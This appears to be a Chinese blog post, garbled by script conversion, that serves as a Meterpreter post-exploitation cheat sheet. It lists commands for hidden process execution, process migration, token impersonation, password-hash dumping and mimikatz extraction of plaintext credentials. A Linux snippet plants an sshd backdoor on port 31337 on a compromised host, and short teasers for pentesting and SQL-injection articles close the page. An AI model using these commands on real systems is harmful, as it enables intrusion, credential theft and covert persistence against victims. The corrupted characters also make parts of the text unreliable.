後滲透指令碼知識

2021-10-23 08:28:58 字數 2167 閱讀 4228

許可權維持、許可權提公升、內網滲透等

內網滲透:資訊蒐集、讀取使用者hash、瀏覽器密碼

域滲透:獲取域控的控制權

meterpreter是metasploit框架中的乙個擴充套件模組,在攻擊成 功以後給我們返回乙個控制通道,是metsploit後滲透必不可少的 ,它具有強大的功能,包括socks**,埠**,鍵盤監聽等多 個功能,meterpreter可以說是內網滲透測試神器。

基本功能

(1)系統資訊獲取

(2)密碼雜湊匯出

(4)螢幕擷取

(5)鍵盤記錄

(6)許可權提公升

(7)跳板攻擊

(8)反追蹤

1.基本命令

background # 讓meterpreter處於後台模式

sessions -i index # 與會話進行互動,index表示第乙個session

quit # 退出會話

shell # 獲得控制台許可權

irb # 開啟ruby終端

2.檔案操作命令

cat # 檢視檔案內容

getwd # 檢視當前工作目錄

upload # 上傳檔案到目標機上

edit # 編輯檔案

search # 搜尋檔案

3.網路命令

ipconfig / ifconfig # 檢視網路介面資訊

portfwd # 埠** 本機監聽埠 把目標機埠轉到本機埠上

rdesktop # 使用rdesktop來連線 -u 使用者名稱 -p 密碼

route # 獲取路由表資訊

4.系統命令

ps # 檢視當前活躍程序

migrate pid # 將meterpreter會話移植到程序數字pid的程序中

execute -h -i -f cmd.exe # 建立新程序cmd.exe,-h不可見,-i互動

getpid # 獲取當前程序的pid

kill pid # 殺死程序

getuid # 檢視許可權

sysinfo # 檢視目標機系統資訊,如機器名,作業系統等

shutdown # 關機

1.post模組

run post/windows/gather/dumplinks #獲取最近的檔案操作

run scraper #獲取常見資訊 #儲存在~/.msf4/logs/scripts/scraper/目錄下

run post/windows/gather/enum_patches #補丁資訊

run post/windows/gather/enum_domain #查詢域控

2.load命令

load #載入模組

meterpreter > load mimikatz #載入mimikatz

meterpreter > load incognito #載入incoginto 盜竊目標主機的令牌或是假冒使用者

3.資訊蒐集

①檢視是否為虛擬機器

run post/windows/gather/checkvm

③idletime :檢查受害者閒置多久

④screenshot :截圖

4.使用者口令

①hash

我們需要將administrator許可權提公升至system許可權才能獲取成功

meterpreter > run post/windows/gather/smart_hashdump

將域的密碼也打出來

②mimikatz

meterpreter > load mimikatz #載入mimikatz

meterpreter > msv #獲取hash值

meterpreter > kerberos #獲取明文

meterpreter > ssp #獲取明文資訊

meterpreter > wdigest #獲取系統賬戶資訊

meterpreter > mimikatz_command -f a:: #必須要以錯誤的模組來讓正確的模組顯示

meterpreter > mimikatz_command -f hash:: #獲取目標 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchpasswords

linux 後滲透測試

linux 常用shell 方法小結 入侵得到shell後,對方防火牆沒限制,想快速開放乙個可以訪問的ssh埠肉雞上執行 myles localhost ln sf usr sbin sshd tmp su tmp su oport 31337就會派生乙個31337埠,然後連線31337,用root...

滲透測試必備知識

這個 chat 是面向小白的,目的是讓剛接觸 web 安全的朋友們熟悉滲透測試這個行業,以及你要準備什麼 學習什麼。通過本 chat,你可以學習到 網路安全的常用術語 網頁的原理 常見的漏洞以及原理 如何高效地通過搜尋引擎自學 滲透測試的流程和思路 通過什麼參考資料學習 知識的學習在於理解和運用。在...

Web滲透 SQL注入知識總結

注入漏洞分類 sql手動注入 sql注入利用工具 sql注入漏洞如何防禦 資料data 在計算機系統中,各種字母 數字 符號的組合,語音 圖形 影象等統稱為資料 資料庫database 資料庫是按照資料結構來組織 儲存 管理資料的 倉庫 資料庫管理系統dbms 一類操縱和管理資料的軟體,用於建立 使...